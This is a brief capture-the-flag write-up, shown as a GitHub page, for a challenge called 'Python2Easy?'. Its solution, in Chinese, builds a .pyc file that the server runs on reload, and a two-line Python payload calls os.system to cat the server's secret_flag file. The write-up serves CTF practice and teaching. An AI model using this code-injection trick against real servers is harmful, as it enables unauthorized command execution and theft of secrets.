Skip to content

Latest commit

 

History

History
10 lines (9 loc) · 254 Bytes

Python2Easy2.md

File metadata and controls

10 lines (9 loc) · 254 Bytes

Python2Easy? (250)

Credits to my teammates

solution

與上題相同,改為生成以下檔案的.pyc,server會在reload時執行system command 發現server上的secret_flag並取得

import os
key = os.system('cat secret_flag')